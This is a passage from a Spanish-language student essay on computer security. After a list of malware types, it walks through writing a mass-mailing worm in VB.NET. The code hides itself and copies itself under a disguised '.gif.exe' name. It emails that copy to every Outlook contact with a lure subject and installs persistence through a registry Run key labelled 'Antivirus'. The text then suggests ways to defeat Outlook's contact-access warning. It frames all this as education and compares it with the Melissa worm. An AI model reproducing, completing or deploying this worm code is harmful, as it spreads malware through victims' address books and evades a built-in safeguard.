TÓPICOS AVANZADOS DE SEGURIDAD COMPUTACIONAL
Enviado por Stella • 29 de Octubre de 2017 • 3.411 Palabras (14 Páginas) • 466 Visitas
...
- Botnets.
- Bots.
- Caballo de Troya (Trojan horse).
- Combinación de dos dos más tipos de códigos maliciosos.
- Exploit.
- Gusano (Worm).
- Inundadores (Flooders).
- Keyloggers.
- Mailers y Mass-Mailers.
- Pharming.
- Phishings.
- Programas generadores de correo spam.
- Puerta trasera (Backdoor).
- RootKit a nivel de núcleo.
- RootKit a nivel usuario.
- Virus.
No son todos los tipos de códigos maliciosos existentes, sin embargo, son los más significativos históricamente y que en la actualidad se manifiestan con más frecuencia. Si se desea conocer un panorama más amplio de estas clasificaciones, así como sus definiciones se deben consultar las secciones de referencias y glosario respectivamente.
EJEMPLOS DE CODIGOS MALISIOSOS
En primera instancia explicaremos como escribir un gusano en Visual Basic .net y posteriormente se comparará y explicará el código del gusano Melissa.
Lo primera será crear un nuevo proyecto de Visual Basic .net y clickear dos veces sobre el formulario principal, con esto pasaremos a escribir el código que se ejecutará cuando se cargue el formulario. Introduciremos el siguiente código donde ya se explica en los comentarios el funcionamiento del mismo:
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Me.Hide()
' Creamos una aplicacion de Outlook
Dim oApp As Outlook.Application = New Outlook.Application Dim oNS As Outlook.NameSpace = oApp.GetNamespace("mapi")
' Nos identificamos como quienes somos los usuarios del sistema ☺ oNS.Logon("", "", False, True)
'Abrimos los contactos *(1)
Dim cContacts As Outlook.MAPIFolder = oNS.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderContacts)
'Definimos las variables necesarias para recorrer los contactos
Dim oItems As Outlook.Items = cContacts.Items Dim oCt As Outlook.ContactItem Dim i As Int16
'Borramos/Modificamos/Grabamos todo aquello que se considere oportuno 'Tendras permiso para hacer todo lo que los permisos del usuario te 'permitan System.IO.File.Delete("C:\archivo.exe") System.IO.File.Copy(Application.ExecutablePath, "C:\FotoDeLaChicSuperMegaGuapa.gif.exe")
'Vamos a mandar los emails ☺ Dim sBodyLen As String Dim oMsg As Outlook._MailItem 'Un objeto email para enviar 'Ruta del fichero que vamos a adjuntar Dim sSource As String = "C:\FotoDeLaChicSuperMegaGuapa4.gif.exe" Dim sDisplayName As String = "FotoDeLaChicSuperMegaGuapa4.exe"
oCt = oItems.GetFirst()
'Recorremos todos los contactos enviando uno por uno los datos
For i = 0 To (oItems.Count() - 1)
Try
oMsg = oApp.CreateItem(Outlook.OlItemType.olMailItem)
'Ponemos un asunto atractivo ☺ oMsg.Subject = "quiero conocerte, te acuerdas de mi?"
'Un texto adecuado
oMsg.Body = "Texto" & vbCr & vbCr
sBodyLen = oMsg.Body.Length
'Adjuntamos
oMsg.Attachments.Add(sSource, , sBodyLen + 1, sDisplayName)
'La direccion a enviar sera la del contacto correspondiente de 'la libreta de direcciones
oMsg.To = oCt.Email1Address
'Enviamos el email :)
oMsg.Send()
'Obtenemos el siguiente contacto
oCt = oItems.GetNext()
Catch ex As Exception
End Try Next
'Colocamos dicho programa en el arranque del sistema
Try Dim runK As RegistryKey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\Current Version\Run", True)
runK.SetValue("Antivirus", "RUTA") Catch ex As Exception
End Try
Como se puede observar una persona con no demasiados conocimientos podría escribir este código. Actualmente este código no funciona, ya que cuando accedemos a la agenda de direcciones para obtener los contactos se produce una excepción en la cual pierde el control el programa y lanza un mensaje de aviso en el cual pregunta sobre si permitir o no el acceso a dichos datos. Este código se programó en aproximadamente media hora, pero se nos ocurren diferentes métodos para solucionarlo, se podría capturar la llamada a la api y manejar desde el código dicha ventana de aviso o realizar tunneling o simplemente mediante “ingeniería” social en el texto del email “convencer” al receptor de que ese mensaje es lógico y debe aceptarlo para recibir la imagen.
En ejemplo real y similar al anterior fue el gusano Melissa. Fue liberado en Marzo de 1999 y en aquel momento no existía control sobre el acceso a los contactos de Outlook. A pesar de que este virus no realiza ningún efecto dañino contra el sistema, sí tiene efectos secundarios sobre el propio sistema ya que disminuye el rendimiento al estar enviando emails, lo que provoca que la velocidad del tráfico de la red se vea seriamente afectado, provocando grandes pérdidas en las empresas en las que su negocio dependa
...